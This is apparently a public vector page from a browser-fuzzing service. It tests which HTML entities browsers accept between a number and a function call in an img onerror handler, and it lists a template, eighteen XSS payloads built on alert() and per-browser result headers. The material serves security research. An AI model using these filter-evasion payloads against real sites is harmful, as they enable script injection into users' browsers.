Entities allowed between function call and number
This vector uses Shazzer's new features to check which entities are allowed between a function call and number using images. The results are a bit inconsistent yet because I currently wait for page load.
Created byhackvertor
Created Jul 2, 2024
Updated May 27, 2025
Detecting browser...
CategoryEntity Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml_entities
Template used:
<img src=data: onerror="1$[data1]log('html($[data1])')">Sample payloads
<img src=data: onerror="1&alert('&amp;')"><img src=data: onerror="1&alert('&AMP;')"><img src=data: onerror="1*alert('&ast;')"><img src=data: onerror="1,alert('&comma;')"><img src=data: onerror="1>alert('&gt;')"><img src=data: onerror="1>alert('&GT;')"><img src=data: onerror="1^alert('&Hat;')"><img src=data: onerror="1<alert('&lt;')"><img src=data: onerror="1<alert('&LT;')"><img src=data: onerror="1*alert('&midast;')"><img src=data: onerror="1
alert('&NewLine;')"><img src=data: onerror="1%alert('&percnt;')"><img src=data: onerror="1+alert('&plus;')"><img src=data: onerror="1;alert('&semi;')"><img src=data: onerror="1/alert('&sol;')"><img src=data: onerror="1|alert('&verbar;')"><img src=data: onerror="1|alert('&vert;')"><img src=data: onerror="1|alert('&VerticalLine;')">Fuzz results
Chrome 145.0.0.0 desktop Windows NT 10.0
Updated17 Feb 2026
Found 18 results
Loading...
Chrome 144.0.0.0 desktop macOS 10.15.7older version
Updated17 Feb 2026
Found 18 results
Loading...
Firefox 147.0 desktop Linux
Updated1 Feb 2026
Found 18 results
Loading...
Firefox 127.0 desktop macOS 10.15older version
Updated2 Jul 2024
Found 18 results
Loading...
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated18 Feb 2026
Found 18 results
Loading...
Safari 18.0 desktop macOS 10.15.7
Updated2 Jul 2024
Found 18 results
Loading...